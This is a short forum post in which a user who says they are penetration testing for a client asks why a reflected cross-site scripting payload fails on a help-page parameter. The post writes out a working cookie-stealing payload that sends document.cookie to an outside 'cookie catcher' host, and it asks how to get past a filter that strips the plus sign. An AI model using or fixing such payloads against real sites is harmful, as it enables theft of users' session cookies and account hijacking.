[Cross Site Scripting: XSS]

Apologies, I probably should've added that I'm penetration testing for a client 

[Cross Site Scripting: XSS]

Hi All,

I have a problem with a site that seems vulnerable to XSS!

[tt]http://www.site.com/help/topic.php?&topic_name=<script>alert(document.cookie)</script>[/tt]

The above will display the details of the login cookie.  However, I can’t get the following to work:

This however:

[tt]http://www.site.com/help/topic.php?&topic_name=<script>document.location="http://www.mycookiecatcher.com?c="+document.cookie</script>[/tt]

Won't work!

I’ve tried converting it to HEX etc.  Nothing seems to work.  Am I doing something wrong are there security features in modern browsers that prevent this?

When I view the HTML source however, I notice something interesting:

[tt]<script>document.location="http://www.mycookiecatcher.com/c.php?c=" document.cookie</script>[/tt]

It would appear to have filtered out the plus (+) symbol? When I type the URL:

[tt] www.site.com/help/topic.php?&topic_name=<script>document.location="www.mycookiecatcher.com?c="+document.cookie</script> [/tt]

into my browser and hit go, I get a javascript error.  It says that it says it expected a semicolon. 

I would imagine this relates to the plus symbol being filtered? I have tried to convert to HEX but I get the same problem.  Is there anything else I can do.

Thanks,

S.